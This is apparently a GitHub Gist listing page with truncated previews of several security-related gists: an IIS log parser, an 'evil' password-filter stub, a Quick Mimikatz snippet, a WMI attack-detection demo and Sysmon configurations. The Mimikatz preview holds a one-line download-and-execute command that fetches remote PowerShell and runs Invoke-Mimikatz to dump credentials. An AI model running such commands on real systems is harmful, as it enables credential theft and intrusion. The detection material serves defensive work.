jstangroome / ConvertFrom-IISW3CLog.ps1
Created Aug 8, 2013
Function to convert lines in an IIS W3C log file to PowerShell objects
function ConvertFrom-IISW3CLog {
param (
[Parameter(Mandatory, ValueFromPipeline, ValueFromPipelineByPropertyName)]
process {
mubix / evilpassfilter.cpp
Created Sep 10, 2013
Evil "Password Filter"
#include <windows.h>
#include <stdio.h>
#include <WinInet.h>
#include <ntsecapi.h>
void writeToLog(const char* szString)
FILE* pFile = fopen("c:\\windows\\temp\\logFile.txt", "a+");
if (NULL == pFile)
gfoss / Quick-Mimikatz
Last active Feb 18, 2021
Quick Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString(""); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#encoded-mimikatz [local]
mattifestation / WMI_attack_detection.ps1
Last active Jan 25, 2021
BlueHat 2016 - WMI attack detection demo
#region Scriptblocks that will execute upon alert trigger
$LateralMovementDetected = {
$Event = $EventArgs.NewEvent
$EventTime = [DateTime]::FromFileTime($Event.TIME_CREATED)
$MethodName = $Event.MethodName
$Namespace = $Event.Namespace
$Object = $Event.ObjectPath
$User = $Event.User
Neo23x0 / config-client.xml
Last active Oct 22, 2019
Sysmon Base Configuration - Workstations
This is a Microsoft Sysmon configuration to be used on Windows workstations
v0.2.1 December 2016
Florian Roth (with the help and ideas of others)
The focus of this configuration is
- malware detection (execution)
- malware detection (network connections)
- exploit detection
It is not focussed on
Neo23x0 / config-server.xml
Last active Nov 7, 2019
Sysmon Base Configuration - Windows Server
This is a Microsoft Sysmon configuration to be used on Windows server systems
v0.2.1 December 2016
Florian Roth
The focus of this configuration is
- hacking activity on servers / lateral movement (bad admin, attacker)
It is not focussed on
- malware detection (execution)
- malware detection (network connections)